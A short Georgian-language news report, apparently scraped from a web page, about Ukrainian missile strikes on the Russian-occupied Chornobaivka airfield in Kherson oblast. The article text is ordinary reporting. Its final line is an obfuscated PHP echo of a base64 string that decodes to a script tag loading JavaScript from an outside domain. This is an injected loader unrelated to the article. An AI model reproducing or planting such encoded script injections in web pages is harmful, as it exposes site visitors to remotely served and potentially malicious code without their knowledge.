celsiusi
ავერსი საქკაბელი
უკრაინელებმა ხერსონის ოლქში რუსების მიერ დაკავებული ჩერნობაევკას აეროდრომი დაბომბეს. ინფორმაციას უკრაინული მედია ავრცელებს.
 
მედიის ცნობით, ჩერნობაევკას აეროდრომზე სულ მცირე სამი სარაკეტო დარტყმა განხორციელდა. ამასთან, სოციალურ ქსელებში ვრცელდება ფოტოები, სადაც ჩანს, რომ აეროდრომის ტერიტორიიდან კვამლი ამოდის.
 
როგორც მედია წერს, ჩერნობაევკას აეროდრომს რუსები სამეთაურო პუნქტად, ასევე ვერტმფრენების და თვითმფრინავების განთავსებისთვის იყენებენ.
 
უკრაინელები ბოლო რამდენიმე კვირაა, ოკუპირებული ხერსონის ოლქის გათავისუფლებას ცდილობენ.
 
როგორც ოკუპირებული ოლქის ადმინისტრაციის წარმომადგენელი აცხადებს, უკრაინელების წარმატები მიუხედავად, ხერსონის ოლქში ჯერ კიდევ დარჩენილია რუსების შეიარაღებული ძალების მნიშვნელოვანი რაოდენობა.
509
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");